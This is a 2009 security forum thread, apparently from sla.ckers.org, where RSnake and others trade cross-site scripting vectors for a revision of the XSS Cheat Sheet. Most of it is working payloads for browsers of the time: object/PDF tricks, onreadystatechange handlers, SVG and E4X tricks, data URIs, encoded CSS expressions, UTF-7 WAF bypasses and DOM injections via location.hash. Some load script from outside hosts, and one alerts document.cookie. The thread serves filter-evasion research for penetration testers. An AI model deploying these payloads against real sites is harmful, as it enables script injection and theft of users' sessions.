Hey guys - sorry I haven't posted in a while. Busy busy busy. But I'm here to solicit your help! I finally got around to re-testing all of the old vectors, updating them and writing it all up for the next revision of the XSS Cheat Sheet. What I haven't done is add new vectors in yet. So this is your chance if you have known about something for years, want it on the page and want credit for having found it. If you do want to update the cheat sheet with something here's the deal:

1) It must work in one of the browsers listed
2) It must work _without_ user interaction - onmouseover is great and all but it's terrible for demonstration purposes.
3) It must fire a popup with text at a minimum - alert(1) is fine for some things but in reality it must at least pop text to prove that it works for the folks who use this for pen-testing.
4) It must be _significantly_ different from all current vectors listed - by significantly I mean it can't replace a char or two. It's gotta actually be different.
5) It must be a way to bypass filters - not just a JavaScript obfuscation technique - although it might be worthwhile to have one JavaScript obfuscation technique in there (the best/most important) and point back to tra.ckers or the thread on sla.ckers for the rest, since it's really it's own thing.

The goal of the XSS Cheat Sheet was never to make a completely exhaustive list - but rather to bring together unique filters to get people thinking about all the possibilities. It's a cheat-sheet after all! Here's a link to the new page (it will eventually replace the old page and/or I may keep the old page as a revision for posterity): http://ha.ckers.org/xss2.html

So fire away with new vectors only. Oh yeah, and if you paste something here that's identical to something that's already been on the page for three or four years now, I'm going to put a doorknob in a sock and beat you with it. Control-F isn't that hard.

- RSnake
Gotta love it. http://ha.ckers.org

<object data="http://p42.us/xss.pdf">

1. Works in Internet Explorer 8 (may work in earlier versions of IE)
2. No user interaction needed.
3. It alerts text.
4. None of the other vectors use a PDF as the payload. In this case, the pdf is invoking VBScript
5. It can be used to bypass filters and is not just JS obfuscation.

Kuza55 gets credit for this one. He used a variation of it to bypass IE8s built-in XSS filters (a beta version, is now fixed).

Kuza's actual XSS was <object data=anything_at_all.pdf><param name=src value="http://p42.us/xss.pdf"></param></object> which may also warrant a separate entry due to the unique way the object src attribute is used. None of the other vectors really do this (with the src attribute).

@Rsnake - can you number them? would make it a lot easier to refer to different injection. Also, will you cover two stage injections at all - like eval(name) and eval(location.hash)? I see these as above just 'obfuscation'. They are useful ways to inject a *real* XSS payload (not just harmless alert) when the size of the injection is a serious constraint.

In Firefox 1.5-3.6a1 this works - kind of relates to the half-open img tag vectors:

<img src="x onerror=alert(1)//[^"]* (all characters but a double-quote)

This is particularly interesting in EUC-JP/Shift_JIS etc. environments - or in case nullbytes or similar stop the web-server from delivering content. Was reported several weeks ago but considered to be 'not our bug'.

<img src=somevalidimage onreadystatechange=alert(1)>
<image src=somevalidimage onreadystatechange=alert(1)>
<isindex action=javascript:alert(1) type=image>
<applet onreadystatechange=alert(1)>
<script onreadystatechange=alert(1)>
<iframe onreadystatechange=alert(1)>
<style onreadystatechange=alert(1)>
<script onreadystatechange=alert(1)></script>
<iframe onreadystatechange=alert(1)></iframe>
<style onreadystatechange=alert(1)></style>
<xml onreadystatechange=alert(1)>
<xml onreadystatechange=alert(1)>test</xml>
<object type=image src=http://www.businessinfo.co.uk/labs/hackvertor/images/logo.gif onreadystatechange=alert(1)></object>
<img type=image src=http://www.businessinfo.co.uk/labs/hackvertor/images/logo.gif onreadystatechange=alert(1)>
<image type=image src=http://www.businessinfo.co.uk/labs/hackvertor/images/logo.gif onreadystatechange=alert(1)>

Language attribute to force VBS:-
<b alt=1 onmouseover=InputBox+1 language=vbs>test</b>

Opera vectors work in certain conditions have to be triggered:-
<table background=javascript:alert(1)>
<table background=javascript&#14848:alert(1)>
<table background=javascript&#14848&#14848&#14848&#14848&#14848:alert(1)>

<video src=1 onerror=alert(1)>
<audio src=1 onerror=alert(1)>

More from cosine:-
<video src="hxxp://tinyvid.tv/file/29d6g90a204i1.ogg" onloadedmetadata="alert(document.cookie);" ondurationchanged="alert(/XSS2/);" ontimeupdate="alert(/XSS1/);">

Dom based vectors:-
document.URL='javascript:alert(1)';//IE only
<img src=1 onerror=URL='javascript:alert(1)'>
hxxp://someserver.com/somepage.php?
param=",eval(location.hash.slice(1))//#alert(1)
hxxp://someserver.com/somepage.php?
param=",location='javascript:/*'+location.hash//#*/alert(1)

More from Giorgio:-
hxxp://someserver.com/somepage.php?param=“,location=’javascript:’+location#%0aalert(1)
hxxp://someserver.com/somepage.php?param=“,location=name

name = 'alert(1)'
-Infinity++in eval(1&&name)
1,0000instanceof delete~void--Infinity/~alert(1)

E4X:-
default xml namespace=toolbar,b=1&&this.atob
default xml namespace=toolbar,e2=b('ZXZhbA')
default xml namespace=toolbar,e=this[toolbar,e2]
default xml namespace=toolbar,y=1&&name
default xml namespace=toolbar
default xml namespace=e(y)

(!1..@*::abc?alert:1..@*::xyz)(1)
1..@Numbers/(are=1)%1..*::xml

From Giorgio:-
eval(<>&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;</>+[])

Applets:-
<applet src="data:text/html;base64,PHNjcmlwdD5hbGVydCgvWFNTLyk8L3N
jcmlwdD4" type=text/html>
<applet src="http://www.businessinfo.co.uk" type=text/html>

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]



Edited 3 time(s). Last edit at 08/11/2009 03:05AM by Gareth Heyes.

<xss:script xmlns:xss="http://www.w3.org/1999/xhtml" src="http://0x.lv/"/>
for xml and xhtml files.. eg:
http://warzone.elhacker.net/xss.xml

firefox.

other example:

data:text/xml,<xss:script xmlns:xss="http://www.w3.org/1999/xhtml">alert(123)</xss:script>

so..

<iframe src='data:text/xml,<xss:script xmlns:xss="http://www.w3.org/1999/xhtml">alert(123)</xss:script>'>

and base64 on data URIs on iframes.. data:text/html;base64,... (and gareth already showed this with <applet type=html> and <object> sometimes also behaves as iframe, so you could also add it.

also you can put an encoding in there, etc.. too many attacks

Anyway dude, the xss cheatlist can be improoved in an amazing way by tra.ckers.org....

./pressure.pl -h tra.ckers.org -p /rsnake

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat



Edited 4 time(s). Last edit at 08/11/2009 03:52AM by sirdarckcat.

@sirdarckcat: haha - the content type set via data URI is nice!

<svg:g onload="alert(8)"/> //FF with right namespace (s.a. *g*)

<image src="x" onerror="alert(1)"></image> //FF, Opera

Opera 10 SVG font XSS
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN"
    "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg xmlns="http://www.w3..0/svg" onload="alert(1)"></svg>


<html>
<head>
<style type="text/css">
@font-face {
  font-family: xss;
  src: url(test.svg#xss) format("svg");
}
body {font: 0px "xss"; }
</style>
</head>

More soon - my plane goes in some or two hours.

<a href='data:text/xml,<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE html [ <!ENTITY inject "&#60;script&#62;alert(1)&#60;/script&#62;">]><html xmlns="http://www.w3.org/1999/xhtml">&inject;</html>'>haha</a>

This used to work on FF <=3.0
@import 'data:text/css,* { -moz-binding:url(http://www.businessinfo.co.uk/labs/xbl/xbl.xml#xss) }';

CSS expressions I could go on all night :)

<div style="xss:expression(window.x?0:(alert(/XSS/),window.x=1));"></div>
<div style="\0078\0073\0073:\0065\0078\0070\0072\0065\0073\0073\0069\006f\006e(window.x?0:(alert(/XSS/),window.x=1));"></div>
<div style="\0078 \0073 \0073: \0065 \0078 \0070 \0072 \0065 \0073 \0073 \0069 \006f \006e(window.x?0:(alert(/XSS/),window.x=1));"></div>
<div style="xss:\000065\000078\00070\00072\00065\000073\00073\00069\0006f\006e(window.x?0:(alert(/XSS/),window.x=1));"></div>
<div style="xs\0s:e\x\pression\(window.x?0:(alert(/XSS/),window.x=1)\);"></div>
<div style="\0078\0073\0073:\0065&#65279;\0078&#65279;\0070&#65279;\0072&#65279;\0065&#65279;\0073&#65279;\0073&#65279;\0069&#65279;\006f&#65279;\006e&#65279;(window.x?0:(alert(/XSS/),window.x=1));"></div>
<div style="\0078\0073\0073&#62&#58&#92&#48&#48&#54&#53&#92&#48&#48&#55&#56&#92&#48&#48&#55&#48&#92&#48&#48&#55&#50&#92&#48&#48&#54&#53&#92&#48&#48&#55&#51&#92&#48&#48&#55&#51&#92&#48&#48&#54&#57&#92&#48&#48&#54&#102&#92&#48&#48&#54&#101(window.x?0:(alert(/XSS/),window.x=1));"></div>
<div style="\0000000000078\0000000000073s:e&#x5c;&#x78;p/*tbeorhf*/ression(window.x?0:(alert(/XSS/),window.x=1));"></div>

Encoded comments:-
<div style="xss:ex&#47;&#42;&#79;&#77;&#71;&#42;&#47;pression(window.x?0:(alert(/XSS/),window.x=1));"></div>

The VB example doesn't require () :-
<IMG SRC=a onerror='vbscript:msgbox"XSS"'>

And how about vbs: 
<img src=1 onerror="vbs:MsgBox 1">

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]



Edited 5 time(s). Last edit at 08/11/2009 09:12AM by Gareth Heyes.

@thornmaker

Does that one without the param tag work cross-domain? I could only get that form to work on the same-domain, hence the param crap I had to find to stick on.

----------------------------------------------------------
Don't forget our IRC: irc://irc.irchighway.net/#slackers
[kuza55.blogspot.com]

@kuza55

Nope it doesn't you're right. Data attribute can only work same domain apart from your technique.

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Firefox:-
<object data="javascript:alert(1)">

./pressure.pl -h tra.ckers.org -p /rsnake

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]



Edited 1 time(s). Last edit at 08/11/2009 10:34AM by Gareth Heyes.

@Gareth

I think you meant ./pressure.pl -s tra.ckers.org && irc -p id \#0b\#0i\#0t\#0c\#0h

:)

--thrill

---

It is not the degrees you hold, but the mind you possess. - thrill

Two from Lewis Write:

Gecko ignores the quote before the attribute identifier:

<script "src="http://ha.ckers.org/xss.js"></script>

And you can put a form feed chr(12) between the <script and src elements in Internet Explorer.

@Gareth - all of the onreadystatechange ones mentioned above should be covered given that it's mentioned in the Event Handlers list already. Unless you think there's some other reason it should be called out independently. Also, CSS expressions are already on the cheat sheet. New vectors should be new, not minor variants on existing vectors. I want to stay away from trying to enumerate every variant possible.

- RSnake
Gotta love it. http://ha.ckers.org

@rsnake

Yeah onreadystatechange should be included because it allows execution of tags in events that normally not possible and can also beat filters that blacklist known attack vectors.

The double encoded CSS expression shouldn't be included? What sort of cheat sheet are you having? OK please don't include any of my vectors in your "cheatsheet" I'll do my own.

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

@Kuza55 @Gareth - you're right - <object data="xss.pdf"></object> only works on same domain. I should have checked that before. Makes the fact that the param version works at all the stranger/cooler though :)

@gareth the CSS double encoding is obfuscation to achieve evasion, is not a new attack vector is an improved one isnt it?

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat

@sirdarckcat

Well I see it as a new vector because you can combine hex escapes and html encoding. Going on that logic, why does the cheatsheet contain multiple &#000 and for example why does it then contain :-

<IMG SRC="javascript:alert('XSS');">

and then
<IMG SRC=javascript:alert('XSS')>

OMG no quotes! That's far more advanced then double encoding anything

I'm annoyed because the cheatsheet breaks these "rules".

Oh yeah I hate it when people defy logic so I'll continue my rant:-
FROM THE CHEATSHEET (These must all be new vectors apparently):-

<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=JaVaScRiPt:alert('XSS')>
<IMG SRC=javascript:alert(&quot;XSS&quot;)>
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]



Edited 1 time(s). Last edit at 08/12/2009 03:09AM by Gareth Heyes.

haha ok, sorry I forgot the cheatsheet had those :(

so yeah, either the cheatsheet removes all variations or includes all variations anything in between would make it incomplete.

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat

@Gareth - seriously relax, it'll be okay. I'm not saying you're dumb, I just don't want to make the cheat sheet a cheat book. onReadyState change, as I said, is already on the cheat sheet in the even handlers section. Can you give me a good reason it needs to be included beyond that? Specific now, not just "It evades filters" why is it important? And no, I'm not putting 10 of the same event handler on there. I may make one note of it and enumerate why it's different, but only if it's really worth mentioning.

The CSS vectors are at least somewhat repeats of one another. A few of them I do think belong on there, but I can't put every single variant and still make it readable. If one or two are notable, or if you can combine them all into one, that's much better. Otherwise it'll get even more unruly than it is now. Again, it's a cheat sheet, not a cheat book. The goal is to make it nice and compact and above all useful!

Now that said, I agree the <IMG SRC vectors seem a little out of context if you're thinking about wOw factor. But I definitely wasn't when I wrote this. Remember, the original reason I put it on there was to enumerate what chars needed to be there or not. At least once a week I run into a vector that requires that certain chars are not present. So these all make sense in that context. Perhaps they could be collapsed into other vectors, but yes, needing or not needing double quotes is something that needs to be spelled out at least somewhere on the cheat sheet. In fact, I removed the one with &quot; below, because it's redundant with the last one and I changed one of the others to use onerror because I think people were thinking that image tags weren't dangerous anymore because IE changed their behavior in IE7.0. That's what I get for retaining a document that dates back to IE6.

<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=JaVaScRiPt:alert('XSS')>
<IMG SRC=javascript:alert(&quot;XSS&quot;)>
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

If you still think I'm on crack, so be it.

Anyway, I'm not particularly interested in bickering. This is another one I think is worthy of inclusion because it's totally different. Submitted by Jeff Channell (BBCode):

red xss

- RSnake
Gotta love it. http://ha.ckers.org

It may be worth including the CSS expression vector with the minor variant that fixes the looping issue. I say this only because the variant is what makes the vector practical. Originally seen: http://sla.ckers.org/forum/read.php?2,15812#msg-15849

<DIV STYLE="width: expression((window.r==1)?'':eval('r=1;alert(String.fromCharCode(88,83,83));'))">

And I'm sure that could be cleaned up a bit for the cheat sheet- I've seen it put this way, which simpler:

<DIV STYLE="width: expression(window.r?0:(alert('XSS'),window.r=1));">

Compare to current cheat sheet vector:

<DIV STYLE="width: expression(alert('XSS'));">

-Dan

@rsnake

Onreadystate only works on IE and can be triggered with certain tags. That's why because it's not obvious. The CSS Expression vector is double encoded and wasn't mentioned anywhere on the net.

As for the BB vector that's just an expression. So what? Maybe we're on different pages because I don't see where this is going. I agree with you about the bickering though so I'll leave it there

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

everything would be solved with tra.ckers.org

the cheatsheet would still be used by.. well.. CISSPs, and tra.ckers by us :)

this way if we need evasion / obfuscation techniques we can put them in tra.ckers, and if CISSPs need vectors, they can use the cheat sheet.

So.. tra.ckers ftw!!

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat

thornmaker showed me today a WAF in the CISSP factory that detected <[\w!/].

so this vector would bypass this filter..

<?xml version="1.0" encoding="utf-7"?>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-

pretty simple! :)

anyhow, it must be at the begining of the document, but that may be avoidable via data islands and such, but I havent reprod.

IE also supports XML stylesheets so now we can make IE execute JS on XML files
http://google.sirdarckcat.net/ohtry.xml
<?xml-stylesheet type="text/css" href="style.css"?>

I think style.css can be cross-site.

and any other browser supports the namespace trick so.. the previous URI on google.sirdarckcat should work on all browsers IE included.

Greetz!!

PS. I use google.sirdarckcat.net because was the closest server haha.. it wont steal your cookies I promise! xDD

Greetz!!

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat

Quote

everything would be solved with tra.ckers.org

the cheatsheet would still be used by.. well.. CISSPs, and tra.ckers by us :)

Yep - absolutely.

IE8:

<hr onresize=alert(1)>

LOL, I used the object tag to bypass NoScript a year ago, now I see it here rehashed again. You guys really aren't paying attention! you were vulnerable all this time! Ghehe.

Eh, the use of data schemes are bit old, I thought they were on the XSS sheet already? awkward.

But there's plenty more, lot of it in conditional comments which I don't see listed.

I've been using half open image tags since back then in the early fifties - and what did I get?



Edited 1 time(s). Last edit at 08/15/2009 10:08AM by .mario.

a slap on the wrist for being so old! Ghehe.

Oh my :)

sirdarckcat Wrote:
>
> the cheatsheet would still be used by.. well..
> CISSPs, and tra.ckers by us :)

I don't wanna spoil anything, but thornmaker is CISSP'd :P

nEUrOO -- http://rgaucher.info -- http://twitter.com/rgaucher

so this must be what my brother felt like when my mom outted him... I guess I can wear my CSSLP hat outside with pride now

@thornmaker

hahahahahahhahhaahaha you kept that quiet
**Pointing and laughing**

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]